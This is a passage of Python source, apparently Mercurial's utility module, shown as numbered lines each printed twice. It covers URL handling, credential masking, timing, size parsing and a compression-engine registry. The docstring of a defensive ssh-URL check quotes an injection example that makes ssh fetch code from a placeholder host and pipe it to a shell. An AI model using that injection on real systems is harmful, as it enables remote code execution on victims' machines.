2779 if ':' in self.user:
2779 if ':' in self.user:
2780 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2781 if not self.host:
2781 if not self.host:
2782 self.host = None
2782 self.host = None
2783
2783
2784 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2785 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2787 self._hostport = self.host
2787 self._hostport = self.host
2788 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2789 if not self.host:
2789 if not self.host:
2790 self.host = None
2790 self.host = None
2791
2791
2792 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2795
2795
2796 self.path = path
2796 self.path = path
2797
2797
2798 # leave the query string escaped
2798 # leave the query string escaped
2799 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2800 'path', 'fragment'):
2800 'path', 'fragment'):
2801 v = getattr(self, a)
2801 v = getattr(self, a)
2802 if v is not None:
2802 if v is not None:
2803 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2804
2804
2805 @encoding.strmethod
2805 @encoding.strmethod
2806 def __repr__(self):
2806 def __repr__(self):
2807 attrs = []
2807 attrs = []
2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2809 'query', 'fragment'):
2809 'query', 'fragment'):
2810 v = getattr(self, a)
2810 v = getattr(self, a)
2811 if v is not None:
2811 if v is not None:
2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2813 return '<url %s>' % ', '.join(attrs)
2813 return '<url %s>' % ', '.join(attrs)
2814
2814
2815 def __bytes__(self):
2815 def __bytes__(self):
2816 r"""Join the URL's components back into a URL string.
2816 r"""Join the URL's components back into a URL string.
2817
2817
2818 Examples:
2818 Examples:
2819
2819
2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2823 'http://user:pw@host:80/?foo=bar&baz=42'
2823 'http://user:pw@host:80/?foo=bar&baz=42'
2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2827 'ssh://user:pw@[::1]:2200//home/joe#'
2827 'ssh://user:pw@[::1]:2200//home/joe#'
2828 >>> bytes(url(b'http://localhost:80//'))
2828 >>> bytes(url(b'http://localhost:80//'))
2829 'http://localhost:80//'
2829 'http://localhost:80//'
2830 >>> bytes(url(b'http://localhost:80/'))
2830 >>> bytes(url(b'http://localhost:80/'))
2831 'http://localhost:80/'
2831 'http://localhost:80/'
2832 >>> bytes(url(b'http://localhost:80'))
2832 >>> bytes(url(b'http://localhost:80'))
2833 'http://localhost:80/'
2833 'http://localhost:80/'
2834 >>> bytes(url(b'bundle:foo'))
2834 >>> bytes(url(b'bundle:foo'))
2835 'bundle:foo'
2835 'bundle:foo'
2836 >>> bytes(url(b'bundle://../foo'))
2836 >>> bytes(url(b'bundle://../foo'))
2837 'bundle:../foo'
2837 'bundle:../foo'
2838 >>> bytes(url(b'path'))
2838 >>> bytes(url(b'path'))
2839 'path'
2839 'path'
2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2841 'file:///tmp/foo/bar'
2841 'file:///tmp/foo/bar'
2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2843 'file:///c:/tmp/foo/bar'
2843 'file:///c:/tmp/foo/bar'
2844 >>> print(url(br'bundle:foo\bar'))
2844 >>> print(url(br'bundle:foo\bar'))
2845 bundle:foo\bar
2845 bundle:foo\bar
2846 >>> print(url(br'file:///D:\data\hg'))
2846 >>> print(url(br'file:///D:\data\hg'))
2847 file:///D:\data\hg
2847 file:///D:\data\hg
2848 """
2848 """
2849 if self._localpath:
2849 if self._localpath:
2850 s = self.path
2850 s = self.path
2851 if self.scheme == 'bundle':
2851 if self.scheme == 'bundle':
2852 s = 'bundle:' + s
2852 s = 'bundle:' + s
2853 if self.fragment:
2853 if self.fragment:
2854 s += '#' + self.fragment
2854 s += '#' + self.fragment
2855 return s
2855 return s
2856
2856
2857 s = self.scheme + ':'
2857 s = self.scheme + ':'
2858 if self.user or self.passwd or self.host:
2858 if self.user or self.passwd or self.host:
2859 s += '//'
2859 s += '//'
2860 elif self.scheme and (not self.path or self.path.startswith('/')
2860 elif self.scheme and (not self.path or self.path.startswith('/')
2861 or hasdriveletter(self.path)):
2861 or hasdriveletter(self.path)):
2862 s += '//'
2862 s += '//'
2863 if hasdriveletter(self.path):
2863 if hasdriveletter(self.path):
2864 s += '/'
2864 s += '/'
2865 if self.user:
2865 if self.user:
2866 s += urlreq.quote(self.user, safe=self._safechars)
2866 s += urlreq.quote(self.user, safe=self._safechars)
2867 if self.passwd:
2867 if self.passwd:
2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2869 if self.user or self.passwd:
2869 if self.user or self.passwd:
2870 s += '@'
2870 s += '@'
2871 if self.host:
2871 if self.host:
2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2873 s += urlreq.quote(self.host)
2873 s += urlreq.quote(self.host)
2874 else:
2874 else:
2875 s += self.host
2875 s += self.host
2876 if self.port:
2876 if self.port:
2877 s += ':' + urlreq.quote(self.port)
2877 s += ':' + urlreq.quote(self.port)
2878 if self.host:
2878 if self.host:
2879 s += '/'
2879 s += '/'
2880 if self.path:
2880 if self.path:
2881 # TODO: similar to the query string, we should not unescape the
2881 # TODO: similar to the query string, we should not unescape the
2882 # path when we store it, the path might contain '%2f' = '/',
2882 # path when we store it, the path might contain '%2f' = '/',
2883 # which we should *not* escape.
2883 # which we should *not* escape.
2884 s += urlreq.quote(self.path, safe=self._safepchars)
2884 s += urlreq.quote(self.path, safe=self._safepchars)
2885 if self.query:
2885 if self.query:
2886 # we store the query in escaped form.
2886 # we store the query in escaped form.
2887 s += '?' + self.query
2887 s += '?' + self.query
2888 if self.fragment is not None:
2888 if self.fragment is not None:
2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2890 return s
2890 return s
2891
2891
2892 __str__ = encoding.strmethod(__bytes__)
2892 __str__ = encoding.strmethod(__bytes__)
2893
2893
2894 def authinfo(self):
2894 def authinfo(self):
2895 user, passwd = self.user, self.passwd
2895 user, passwd = self.user, self.passwd
2896 try:
2896 try:
2897 self.user, self.passwd = None, None
2897 self.user, self.passwd = None, None
2898 s = bytes(self)
2898 s = bytes(self)
2899 finally:
2899 finally:
2900 self.user, self.passwd = user, passwd
2900 self.user, self.passwd = user, passwd
2901 if not self.user:
2901 if not self.user:
2902 return (s, None)
2902 return (s, None)
2903 # authinfo[1] is passed to urllib2 password manager, and its
2903 # authinfo[1] is passed to urllib2 password manager, and its
2904 # URIs must not contain credentials. The host is passed in the
2904 # URIs must not contain credentials. The host is passed in the
2905 # URIs list because Python < 2.4.3 uses only that to search for
2905 # URIs list because Python < 2.4.3 uses only that to search for
2906 # a password.
2906 # a password.
2907 return (s, (None, (s, self.host),
2907 return (s, (None, (s, self.host),
2908 self.user, self.passwd or ''))
2908 self.user, self.passwd or ''))
2909
2909
2910 def isabs(self):
2910 def isabs(self):
2911 if self.scheme and self.scheme != 'file':
2911 if self.scheme and self.scheme != 'file':
2912 return True # remote URL
2912 return True # remote URL
2913 if hasdriveletter(self.path):
2913 if hasdriveletter(self.path):
2914 return True # absolute for our purposes - can't be joined()
2914 return True # absolute for our purposes - can't be joined()
2915 if self.path.startswith(br'\\'):
2915 if self.path.startswith(br'\\'):
2916 return True # Windows UNC path
2916 return True # Windows UNC path
2917 if self.path.startswith('/'):
2917 if self.path.startswith('/'):
2918 return True # POSIX-style
2918 return True # POSIX-style
2919 return False
2919 return False
2920
2920
2921 def localpath(self):
2921 def localpath(self):
2922 if self.scheme == 'file' or self.scheme == 'bundle':
2922 if self.scheme == 'file' or self.scheme == 'bundle':
2923 path = self.path or '/'
2923 path = self.path or '/'
2924 # For Windows, we need to promote hosts containing drive
2924 # For Windows, we need to promote hosts containing drive
2925 # letters to paths with drive letters.
2925 # letters to paths with drive letters.
2926 if hasdriveletter(self._hostport):
2926 if hasdriveletter(self._hostport):
2927 path = self._hostport + '/' + self.path
2927 path = self._hostport + '/' + self.path
2928 elif (self.host is not None and self.path
2928 elif (self.host is not None and self.path
2929 and not hasdriveletter(path)):
2929 and not hasdriveletter(path)):
2930 path = '/' + path
2930 path = '/' + path
2931 return path
2931 return path
2932 return self._origpath
2932 return self._origpath
2933
2933
2934 def islocal(self):
2934 def islocal(self):
2935 '''whether localpath will return something that posixfile can open'''
2935 '''whether localpath will return something that posixfile can open'''
2936 return (not self.scheme or self.scheme == 'file'
2936 return (not self.scheme or self.scheme == 'file'
2937 or self.scheme == 'bundle')
2937 or self.scheme == 'bundle')
2938
2938
2939 def hasscheme(path):
2939 def hasscheme(path):
2940 return bool(url(path).scheme)
2940 return bool(url(path).scheme)
2941
2941
2942 def hasdriveletter(path):
2942 def hasdriveletter(path):
2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2944
2944
2945 def urllocalpath(path):
2945 def urllocalpath(path):
2946 return url(path, parsequery=False, parsefragment=False).localpath()
2946 return url(path, parsequery=False, parsefragment=False).localpath()
2947
2947
2948 def checksafessh(path):
2948 def checksafessh(path):
2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2950
2950
2951 This is a sanity check for ssh urls. ssh will parse the first item as
2951 This is a sanity check for ssh urls. ssh will parse the first item as
2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2953 Let's prevent these potentially exploited urls entirely and warn the
2953 Let's prevent these potentially exploited urls entirely and warn the
2954 user.
2954 user.
2955
2955
2956 Raises an error.Abort when the url is unsafe.
2956 Raises an error.Abort when the url is unsafe.
2957 """
2957 """
2958 path = urlreq.unquote(path)
2958 path = urlreq.unquote(path)
2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2960 raise error.Abort(_('potentially unsafe url: %r') %
2960 raise error.Abort(_('potentially unsafe url: %r') %
2961 (pycompat.bytestr(path),))
2961 (pycompat.bytestr(path),))
2962
2962
2963 def hidepassword(u):
2963 def hidepassword(u):
2964 '''hide user credential in a url string'''
2964 '''hide user credential in a url string'''
2965 u = url(u)
2965 u = url(u)
2966 if u.passwd:
2966 if u.passwd:
2967 u.passwd = '***'
2967 u.passwd = '***'
2968 return bytes(u)
2968 return bytes(u)
2969
2969
2970 def removeauth(u):
2970 def removeauth(u):
2971 '''remove all authentication information from a url string'''
2971 '''remove all authentication information from a url string'''
2972 u = url(u)
2972 u = url(u)
2973 u.user = u.passwd = None
2973 u.user = u.passwd = None
2974 return bytes(u)
2974 return bytes(u)
2975
2975
2976 timecount = unitcountfn(
2976 timecount = unitcountfn(
2977 (1, 1e3, _('%.0f s')),
2977 (1, 1e3, _('%.0f s')),
2978 (100, 1, _('%.1f s')),
2978 (100, 1, _('%.1f s')),
2979 (10, 1, _('%.2f s')),
2979 (10, 1, _('%.2f s')),
2980 (1, 1, _('%.3f s')),
2980 (1, 1, _('%.3f s')),
2981 (100, 0.001, _('%.1f ms')),
2981 (100, 0.001, _('%.1f ms')),
2982 (10, 0.001, _('%.2f ms')),
2982 (10, 0.001, _('%.2f ms')),
2983 (1, 0.001, _('%.3f ms')),
2983 (1, 0.001, _('%.3f ms')),
2984 (100, 0.000001, _('%.1f us')),
2984 (100, 0.000001, _('%.1f us')),
2985 (10, 0.000001, _('%.2f us')),
2985 (10, 0.000001, _('%.2f us')),
2986 (1, 0.000001, _('%.3f us')),
2986 (1, 0.000001, _('%.3f us')),
2987 (100, 0.000000001, _('%.1f ns')),
2987 (100, 0.000000001, _('%.1f ns')),
2988 (10, 0.000000001, _('%.2f ns')),
2988 (10, 0.000000001, _('%.2f ns')),
2989 (1, 0.000000001, _('%.3f ns')),
2989 (1, 0.000000001, _('%.3f ns')),
2990 )
2990 )
2991
2991
2992 @attr.s
2992 @attr.s
2993 class timedcmstats(object):
2993 class timedcmstats(object):
2994 """Stats information produced by the timedcm context manager on entering."""
2994 """Stats information produced by the timedcm context manager on entering."""
2995
2995
2996 # the starting value of the timer as a float (meaning and resulution is
2996 # the starting value of the timer as a float (meaning and resulution is
2997 # platform dependent, see util.timer)
2997 # platform dependent, see util.timer)
2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2999 # the number of seconds as a floating point value; starts at 0, updated when
2999 # the number of seconds as a floating point value; starts at 0, updated when
3000 # the context is exited.
3000 # the context is exited.
3001 elapsed = attr.ib(default=0)
3001 elapsed = attr.ib(default=0)
3002 # the number of nested timedcm context managers.
3002 # the number of nested timedcm context managers.
3003 level = attr.ib(default=1)
3003 level = attr.ib(default=1)
3004
3004
3005 def __bytes__(self):
3005 def __bytes__(self):
3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3007
3007
3008 __str__ = encoding.strmethod(__bytes__)
3008 __str__ = encoding.strmethod(__bytes__)
3009
3009
3010 @contextlib.contextmanager
3010 @contextlib.contextmanager
3011 def timedcm(whencefmt, *whenceargs):
3011 def timedcm(whencefmt, *whenceargs):
3012 """A context manager that produces timing information for a given context.
3012 """A context manager that produces timing information for a given context.
3013
3013
3014 On entering a timedcmstats instance is produced.
3014 On entering a timedcmstats instance is produced.
3015
3015
3016 This context manager is reentrant.
3016 This context manager is reentrant.
3017
3017
3018 """
3018 """
3019 # track nested context managers
3019 # track nested context managers
3020 timedcm._nested += 1
3020 timedcm._nested += 1
3021 timing_stats = timedcmstats(level=timedcm._nested)
3021 timing_stats = timedcmstats(level=timedcm._nested)
3022 try:
3022 try:
3023 with tracing.log(whencefmt, *whenceargs):
3023 with tracing.log(whencefmt, *whenceargs):
3024 yield timing_stats
3024 yield timing_stats
3025 finally:
3025 finally:
3026 timing_stats.elapsed = timer() - timing_stats.start
3026 timing_stats.elapsed = timer() - timing_stats.start
3027 timedcm._nested -= 1
3027 timedcm._nested -= 1
3028
3028
3029 timedcm._nested = 0
3029 timedcm._nested = 0
3030
3030
3031 def timed(func):
3031 def timed(func):
3032 '''Report the execution time of a function call to stderr.
3032 '''Report the execution time of a function call to stderr.
3033
3033
3034 During development, use as a decorator when you need to measure
3034 During development, use as a decorator when you need to measure
3035 the cost of a function, e.g. as follows:
3035 the cost of a function, e.g. as follows:
3036
3036
3037 @util.timed
3037 @util.timed
3038 def foo(a, b, c):
3038 def foo(a, b, c):
3039 pass
3039 pass
3040 '''
3040 '''
3041
3041
3042 def wrapper(*args, **kwargs):
3042 def wrapper(*args, **kwargs):
3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3044 result = func(*args, **kwargs)
3044 result = func(*args, **kwargs)
3045 stderr = procutil.stderr
3045 stderr = procutil.stderr
3046 stderr.write('%s%s: %s\n' % (
3046 stderr.write('%s%s: %s\n' % (
3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3048 time_stats))
3048 time_stats))
3049 return result
3049 return result
3050 return wrapper
3050 return wrapper
3051
3051
3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3054
3054
3055 def sizetoint(s):
3055 def sizetoint(s):
3056 '''Convert a space specifier to a byte count.
3056 '''Convert a space specifier to a byte count.
3057
3057
3058 >>> sizetoint(b'30')
3058 >>> sizetoint(b'30')
3059 30
3059 30
3060 >>> sizetoint(b'2.2kb')
3060 >>> sizetoint(b'2.2kb')
3061 2252
3061 2252
3062 >>> sizetoint(b'6M')
3062 >>> sizetoint(b'6M')
3063 6291456
3063 6291456
3064 '''
3064 '''
3065 t = s.strip().lower()
3065 t = s.strip().lower()
3066 try:
3066 try:
3067 for k, u in _sizeunits:
3067 for k, u in _sizeunits:
3068 if t.endswith(k):
3068 if t.endswith(k):
3069 return int(float(t[:-len(k)]) * u)
3069 return int(float(t[:-len(k)]) * u)
3070 return int(t)
3070 return int(t)
3071 except ValueError:
3071 except ValueError:
3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3073
3073
3074 class hooks(object):
3074 class hooks(object):
3075 '''A collection of hook functions that can be used to extend a
3075 '''A collection of hook functions that can be used to extend a
3076 function's behavior. Hooks are called in lexicographic order,
3076 function's behavior. Hooks are called in lexicographic order,
3077 based on the names of their sources.'''
3077 based on the names of their sources.'''
3078
3078
3079 def __init__(self):
3079 def __init__(self):
3080 self._hooks = []
3080 self._hooks = []
3081
3081
3082 def add(self, source, hook):
3082 def add(self, source, hook):
3083 self._hooks.append((source, hook))
3083 self._hooks.append((source, hook))
3084
3084
3085 def __call__(self, *args):
3085 def __call__(self, *args):
3086 self._hooks.sort(key=lambda x: x[0])
3086 self._hooks.sort(key=lambda x: x[0])
3087 results = []
3087 results = []
3088 for source, hook in self._hooks:
3088 for source, hook in self._hooks:
3089 results.append(hook(*args))
3089 results.append(hook(*args))
3090 return results
3090 return results
3091
3091
3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3093 '''Yields lines for a nicely formatted stacktrace.
3093 '''Yields lines for a nicely formatted stacktrace.
3094 Skips the 'skip' last entries, then return the last 'depth' entries.
3094 Skips the 'skip' last entries, then return the last 'depth' entries.
3095 Each file+linenumber is formatted according to fileline.
3095 Each file+linenumber is formatted according to fileline.
3096 Each line is formatted according to line.
3096 Each line is formatted according to line.
3097 If line is None, it yields:
3097 If line is None, it yields:
3098 length of longest filepath+line number,
3098 length of longest filepath+line number,
3099 filepath+linenumber,
3099 filepath+linenumber,
3100 function
3100 function
3101
3101
3102 Not be used in production code but very convenient while developing.
3102 Not be used in production code but very convenient while developing.
3103 '''
3103 '''
3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3106 ][-depth:]
3106 ][-depth:]
3107 if entries:
3107 if entries:
3108 fnmax = max(len(entry[0]) for entry in entries)
3108 fnmax = max(len(entry[0]) for entry in entries)
3109 for fnln, func in entries:
3109 for fnln, func in entries:
3110 if line is None:
3110 if line is None:
3111 yield (fnmax, fnln, func)
3111 yield (fnmax, fnln, func)
3112 else:
3112 else:
3113 yield line % (fnmax, fnln, func)
3113 yield line % (fnmax, fnln, func)
3114
3114
3115 def debugstacktrace(msg='stacktrace', skip=0,
3115 def debugstacktrace(msg='stacktrace', skip=0,
3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3118 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3118 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3119 By default it will flush stdout first.
3119 By default it will flush stdout first.
3120 It can be used everywhere and intentionally does not require an ui object.
3120 It can be used everywhere and intentionally does not require an ui object.
3121 Not be used in production code but very convenient while developing.
3121 Not be used in production code but very convenient while developing.
3122 '''
3122 '''
3123 if otherf:
3123 if otherf:
3124 otherf.flush()
3124 otherf.flush()
3125 f.write('%s at:\n' % msg.rstrip())
3125 f.write('%s at:\n' % msg.rstrip())
3126 for line in getstackframes(skip + 1, depth=depth):
3126 for line in getstackframes(skip + 1, depth=depth):
3127 f.write(line)
3127 f.write(line)
3128 f.flush()
3128 f.flush()
3129
3129
3130 class dirs(object):
3130 class dirs(object):
3131 '''a multiset of directory names from a dirstate or manifest'''
3131 '''a multiset of directory names from a dirstate or manifest'''
3132
3132
3133 def __init__(self, map, skip=None):
3133 def __init__(self, map, skip=None):
3134 self._dirs = {}
3134 self._dirs = {}
3135 addpath = self.addpath
3135 addpath = self.addpath
3136 if safehasattr(map, 'iteritems') and skip is not None:
3136 if safehasattr(map, 'iteritems') and skip is not None:
3137 for f, s in map.iteritems():
3137 for f, s in map.iteritems():
3138 if s[0] != skip:
3138 if s[0] != skip:
3139 addpath(f)
3139 addpath(f)
3140 else:
3140 else:
3141 for f in map:
3141 for f in map:
3142 addpath(f)
3142 addpath(f)
3143
3143
3144 def addpath(self, path):
3144 def addpath(self, path):
3145 dirs = self._dirs
3145 dirs = self._dirs
3146 for base in finddirs(path):
3146 for base in finddirs(path):
3147 if base in dirs:
3147 if base in dirs:
3148 dirs[base] += 1
3148 dirs[base] += 1
3149 return
3149 return
3150 dirs[base] = 1
3150 dirs[base] = 1
3151
3151
3152 def delpath(self, path):
3152 def delpath(self, path):
3153 dirs = self._dirs
3153 dirs = self._dirs
3154 for base in finddirs(path):
3154 for base in finddirs(path):
3155 if dirs[base] > 1:
3155 if dirs[base] > 1:
3156 dirs[base] -= 1
3156 dirs[base] -= 1
3157 return
3157 return
3158 del dirs[base]
3158 del dirs[base]
3159
3159
3160 def __iter__(self):
3160 def __iter__(self):
3161 return iter(self._dirs)
3161 return iter(self._dirs)
3162
3162
3163 def __contains__(self, d):
3163 def __contains__(self, d):
3164 return d in self._dirs
3164 return d in self._dirs
3165
3165
3166 if safehasattr(parsers, 'dirs'):
3166 if safehasattr(parsers, 'dirs'):
3167 dirs = parsers.dirs
3167 dirs = parsers.dirs
3168
3168
3169 def finddirs(path):
3169 def finddirs(path):
3170 pos = path.rfind('/')
3170 pos = path.rfind('/')
3171 while pos != -1:
3171 while pos != -1:
3172 yield path[:pos]
3172 yield path[:pos]
3173 pos = path.rfind('/', 0, pos)
3173 pos = path.rfind('/', 0, pos)
3174
3174
3175 # compression code
3175 # compression code
3176
3176
3177 SERVERROLE = 'server'
3177 SERVERROLE = 'server'
3178 CLIENTROLE = 'client'
3178 CLIENTROLE = 'client'
3179
3179
3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3181 (u'name', u'serverpriority',
3181 (u'name', u'serverpriority',
3182 u'clientpriority'))
3182 u'clientpriority'))
3183
3183
3184 class compressormanager(object):
3184 class compressormanager(object):
3185 """Holds registrations of various compression engines.
3185 """Holds registrations of various compression engines.
3186
3186
3187 This class essentially abstracts the differences between compression
3187 This class essentially abstracts the differences between compression
3188 engines to allow new compression formats to be added easily, possibly from
3188 engines to allow new compression formats to be added easily, possibly from
3189 extensions.
3189 extensions.
3190
3190
3191 Compressors are registered against the global instance by calling its
3191 Compressors are registered against the global instance by calling its
3192 ``register()`` method.
3192 ``register()`` method.
3193 """
3193 """
3194 def __init__(self):
3194 def __init__(self):
3195 self._engines = {}
3195 self._engines = {}
3196 # Bundle spec human name to engine name.
3196 # Bundle spec human name to engine name.
3197 self._bundlenames = {}
3197 self._bundlenames = {}
3198 # Internal bundle identifier to engine name.
3198 # Internal bundle identifier to engine name.
3199 self._bundletypes = {}
3199 self._bundletypes = {}
3200 # Revlog header to engine name.
3200 # Revlog header to engine name.
3201 self._revlogheaders = {}
3201 self._revlogheaders = {}
3202 # Wire proto identifier to engine name.
3202 # Wire proto identifier to engine name.
3203 self._wiretypes = {}
3203 self._wiretypes = {}
3204
3204
3205 def __getitem__(self, key):
3205 def __getitem__(self, key):
3206 return self._engines[key]
3206 return self._engines[key]
3207
3207
3208 def __contains__(self, key):
3208 def __contains__(self, key):
3209 return key in self._engines
3209 return key in self._engines
3210
3210
3211 def __iter__(self):
3211 def __iter__(self):
3212 return iter(self._engines.keys())
3212 return iter(self._engines.keys())
3213
3213
3214 def register(self, engine):
3214 def register(self, engine):
3215 """Register a compression engine with the manager.
3215 """Register a compression engine with the manager.
3216
3216
3217 The argument must be a ``compressionengine`` instance.
3217 The argument must be a ``compressionengine`` instance.
3218 """
3218 """
3219 if not isinstance(engine, compressionengine):
3219 if not isinstance(engine, compressionengine):
3220 raise ValueError(_('argument must be a compressionengine'))
3220 raise ValueError(_('argument must be a compressionengine'))
3221
3221
3222 name = engine.name()
3222 name = engine.name()
3223
3223
3224 if name in self._engines:
3224 if name in self._engines:
3225 raise error.Abort(_('compression engine %s already registered') %
3225 raise error.Abort(_('compression engine %s already registered') %
3226 name)
3226 name)
3227
3227
3228 bundleinfo = engine.bundletype()
3228 bundleinfo = engine.bundletype()
3229 if bundleinfo:
3229 if bundleinfo:
3230 bundlename, bundletype = bundleinfo
3230 bundlename, bundletype = bundleinfo
3231
3231
3232 if bundlename in self._bundlenames:
3232 if bundlename in self._bundlenames:
3233 raise error.Abort(_('bundle name %s already registered') %
3233 raise error.Abort(_('bundle name %s already registered') %
3234 bundlename)
3234 bundlename)
3235 if bundletype in self._bundletypes:
3235 if bundletype in self._bundletypes:
3236 raise error.Abort(_('bundle type %s already registered by %s') %
3236 raise error.Abort(_('bundle type %s already registered by %s') %
3237 (bundletype, self._bundletypes[bundletype]))
3237 (bundletype, self._bundletypes[bundletype]))
3238
3238
3239 # No external facing name declared.
3239 # No external facing name declared.
3240 if bundlename:
3240 if bundlename:
3241 self._bundlenames[bundlename] = name
3241 self._bundlenames[bundlename] = name
3242
3242
3243 self._bundletypes[bundletype] = name
3243 self._bundletypes[bundletype] = name
3244
3244
3245 wiresupport = engine.wireprotosupport()
3245 wiresupport = engine.wireprotosupport()
3246 if wiresupport:
3246 if wiresupport:
3247 wiretype = wiresupport.name
3247 wiretype = wiresupport.name
3248 if wiretype in self._wiretypes:
3248 if wiretype in self._wiretypes:
3249 raise error.Abort(_('wire protocol compression %s already '
3249 raise error.Abort(_('wire protocol compression %s already '
3250 'registered by %s') %
3250 'registered by %s') %
3251 (wiretype, self._wiretypes[wiretype]))
3251 (wiretype, self._wiretypes[wiretype]))
3252
3252
3253 self._wiretypes[wiretype] = name
3253 self._wiretypes[wiretype] = name
3254
3254
3255 revlogheader = engine.revlogheader()
3255 revlogheader = engine.revlogheader()
3256 if revlogheader and revlogheader in self._revlogheaders:
3256 if revlogheader and revlogheader in self._revlogheaders:
3257 raise error.Abort(_('revlog header %s already registered by %s') %
3257 raise error.Abort(_('revlog header %s already registered by %s') %
3258 (revlogheader, self._revlogheaders[revlogheader]))
3258 (revlogheader, self._revlogheaders[revlogheader]))
3259
3259
3260 if revlogheader:
3260 if revlogheader:
3261 self._revlogheaders[revlogheader] = name
3261 self._revlogheaders[revlogheader] = name
3262
3262
3263 self._engines[name] = engine
3263 self._engines[name] = engine
3264
3264
3265 @property
3265 @property
3266 def supportedbundlenames(self):
3266 def supportedbundlenames(self):
3267 return set(self._bundlenames.keys())
3267 return set(self._bundlenames.keys())
3268
3268
3269 @property
3269 @property
3270 def supportedbundletypes(self):
3270 def supportedbundletypes(self):
3271 return set(self._bundletypes.keys())
3271 return set(self._bundletypes.keys())
3272
3272
3273 def forbundlename(self, bundlename):
3273 def forbundlename(self, bundlename):
3274 """Obtain a compression engine registered to a bundle name.
3274 """Obtain a compression engine registered to a bundle name.
3275
3275
3276 Will raise KeyError if the bundle type isn't registered.
3276 Will raise KeyError if the bundle type isn't registered.
3277
3277
3278 Will abort if the engine is known but not available.
3278 Will abort if the engine is known but not available.
3279 """
3279 """
3280 engine = self._engines[self._bundlenames[bundlename]]
3280 engine = self._engines[self._bundlenames[bundlename]]
3281 if not engine.available():
3281 if not engine.available():
3282 raise error.Abort(_('compression engine %s could not be loaded') %
3282 raise error.Abort(_('compression engine %s could not be loaded') %
3283 engine.name())
3283 engine.name())
3284 return engine
3284 return engine
3285
3285
